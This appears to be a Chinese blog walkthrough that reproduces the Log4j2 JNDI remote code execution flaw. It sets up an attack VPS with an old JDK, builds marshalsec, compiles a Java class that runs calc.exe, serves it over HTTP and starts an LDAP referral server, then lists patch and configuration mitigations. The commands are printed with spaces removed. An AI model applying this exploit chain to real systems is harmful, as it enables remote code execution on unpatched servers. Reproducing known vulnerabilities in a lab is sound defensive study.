4000-618-418

Apache Log4j2远程代码执行漏洞复现

2021年12月11日

漏洞原理

log4j2版本 < log4j-2.15.0-rc2 可由JNDI注入实现远程代码执行。

影响版本

Log4j2.x<=2.14.1

漏洞复现

漏洞分析的可以参考逐日实验室的这篇:https://mp.weixin.qq.com/s/l7iclJRegADs3oiEdcgAvQ

准备环境

把受影响的jar包拖进随手建立的一个java项目,这里部署jar包步骤就不写了,网上一搜傻瓜式教程都有。
image.png

image.png

攻击机环境搭建,这里我用的vps(师兄的,因为我的是Windows。)jdk版本最好<=8u191,基于ldap的利用方式,适用jdk版本:JDK 11.0.1、8u191、7u201、6u211之前。

这里我的java版本是

curlhttp://www.joaomatosf.com/rnp/java_files/jdk-8u20-linux-x64.tar.gz-ojdk-8u20-linux-x64.tar.gztarzxvfjdk-8u20-linux-x64.tar.gzrm-rf/usr/bin/java*ln-s/opt/jdk1.8.0_20/bin/j*/usr/bin

image.png

下载marshalsec(我这里已经安装好):

gitclonehttps://github.com/mbechler/marshalsec.git

image.png

然后安装maven:

apt-getinstallmaven

然后使用maven编译marshalsec成jar包,我们先进入下载的marshalsec文件中运行:

mvncleanpackage-DskipTests

都成功后,编译恶意类代码robots.java

再用javac编译成robots.class文件

javacrobots.java
importjava.lang.Runtime;importjava.lang.Process;publicclassrobots{static{try{Runtimert=Runtime.getRuntime();String[]commands={"calc.exe"};Processpc=rt.exec(commands);pc.waitFor();}catch(Exceptione){//donothing}}}

image.png

搭建http服务传输恶意class文件

python-mSimpleHTTPServer80

45e13ef22cd9954b27afb68b660169d.png

然后我们借助marshalsec项目,启动一个LDAP服务器,监听9999端口,这里的ip为vps的ip

java-cpmarshalsec-0.0.3-SNAPSHOT-all.jarmarshalsec.jndi.LDAPRefServer"http://x.x.x.x/#robots"9999

image.png

成功执行
image.png

跟fastjson复现步骤差不多,可以参考我fastjson的文章:https://www.freebuf.com/articles/web/283585.html

修复方法

截止到目前,网上的修复方法大致是这些:

补丁链接:
https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2

1)添加jvm启动参数-Dlog4j2.formatMsgNoLookups=true;

2)在应用classpath下添加log4j2.component.properties配置文件,文件内容为log4j2.formatMsgNoLookups=true;

3)JDK使用11.0.1、8u191、7u201、6u211及以上的高版本;

4)部署使用第三方防火墙产品进行安全防护。


上一篇:勒索软件攻击防御的9件事(勒索软件一旦攻击成功)

下一篇:恶意软件即服务的践行者:窃密木马RedLine